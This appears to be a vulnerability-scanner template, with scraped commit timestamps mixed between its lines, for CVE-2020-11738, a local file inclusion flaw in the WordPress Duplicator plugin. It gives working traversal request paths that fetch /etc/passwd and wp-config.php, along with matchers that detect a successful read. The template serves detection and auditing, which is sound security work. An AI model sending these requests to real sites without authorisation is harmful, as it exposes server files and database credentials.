2021-01-02 04:56:15 +00:00
id : CVE-2020-11738
2020-12-12 05:03:34 +00:00
info :
2022-07-26 13:45:11 +00:00
name : WordPress Duplicator 1.3.24 & 1.3.26 - Local File Inclusion
2020-12-12 05:03:34 +00:00
author : dwisiswant0
severity : high
description : |
2022-07-26 13:45:11 +00:00
WordPress Duplicator 1.3.24 & 1.3.26 are vulnerable to local file inclusion vulnerabilities that could allow attackers to download arbitrary files, such as the wp-config.php file. According to the vendor, the vulnerability was only in two
2020-12-12 05:03:34 +00:00
versions v1.3.24 and v1.3.26, the vulnerability wasn't
present in versions 1.3.22 and before.
2022-04-22 10:38:41 +00:00
reference :
- https://www.tenable.com/blog/duplicator-wordpress-plugin-vulnerability-exploited-in-the-wild
2022-05-17 09:18:12 +00:00
- https://snapcreek.com/duplicator/docs/changelog/?lite
- https://www.wordfence.com/blog/2020/02/active-attack-on-recently-patched-duplicator-plugin-vulnerability-affects-over-1-million-sites/
- http://packetstormsecurity.com/files/160621/WordPress-Duplicator-1.3.26-Directory-Traversal-File-Read.html
2022-07-26 13:45:11 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2020-11738
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 7.5
2021-09-10 11:26:40 +00:00
cve-id : CVE-2020-11738
cwe-id : CWE-22
2023-04-12 10:55:48 +00:00
cpe : cpe:2.3:a:snapcreek:duplicator:*:*:*:*:*:*:*:*
epss-score : 0.9729
2022-08-27 04:41:18 +00:00
tags : kev,tenable,packetstorm,cve,cve2020,wordpress,wp-plugin,lfi
2023-04-28 08:11:21 +00:00
metadata :
max-request : 2
2020-12-12 05:03:34 +00:00
2023-04-27 04:28:59 +00:00
http :
2020-12-12 05:03:34 +00:00
- method : GET
path :
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"
- "{{BaseURL}}/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php"
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : regex
regex :
- "File Transfer"
- "application/octet-stream"
- "attachment; filename=\"(wp-config\\.php|passwd)\""
condition : and
part : header
- type : regex
regex :
2021-07-24 21:35:55 +00:00
- "root:.*:0:0:"
2020-12-12 05:03:34 +00:00
- "define\\('DB_(NAME|USER|PASSWORD|HOST|CHARSET|COLLATE)'"
condition : or
2022-07-26 13:45:11 +00:00
part : body
# Enhanced by mp on 2022/07/13